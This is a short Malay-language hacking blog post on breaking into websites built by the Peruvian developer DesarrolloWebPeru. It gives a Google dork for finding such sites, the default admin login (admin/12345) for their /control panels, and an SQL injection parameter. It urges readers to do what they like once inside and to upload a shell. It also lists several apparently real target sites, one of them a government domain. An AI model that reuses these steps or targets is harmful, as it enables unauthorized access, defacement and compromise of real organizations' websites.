Desarrollo Web Peru - Default Login Access & SQLi Vulnerability

 By: Afif    01:02  Deface, Exploits, SQL Injection   No comments

Assalamualaikum dan salam sejahtera.Entry kali ini aku nak ajar exploit pula.Exploit kali ini kita dapat login admin.
Baiklah jom mula.

1. Google Dork : 
intext:"Desarrollado por:DesarrolloWebPeru"

modified dork kalau nak dapat lagi banyak habuan :)

2. Pilih salah satu website dari result.Kemudian buka login page website tersebut iaitu :

http://www.site.com/control

SS login page :

Seterusnya masukkan username dan password default ini :

Username : admin 

Password  : 12345

SIAP!Kalau berjaya masuk maksudnya boleh la :)

SS admin panel :

Lepas dah dapat masuk tu korang buat la apa yang korang nak.Ni contoh aku upload gambar : 

http://www.sleephotelhuacho.com/galeria/comp2/tn_galeria.jpg

Korang boleh try upload shell :)

Demo site :

http://www.ryhconsultores.com/control

http://www.sleephotelhuacho.com/control 

http://www.huarimarka.com/control 

http://municoris.gob.pe/control 

http://www.radioparaisofm.com/control 

http://www.sleephotelhuacho.com/control

4. SQL Injection Vulnerability

exploit ini juga terdedah kepada SQL Injection.

http://www.site.com/?p=detalle_&id=[SQLI DISINI]

Source : http://1337day.com/exploits/19554

Itu saja untuk kali ini.Assalamualaikum.

Item Reviewed: Desarrollo Web Peru - Default Login Access & SQLi Vulnerability Description: Rating: 5 Reviewed By Afif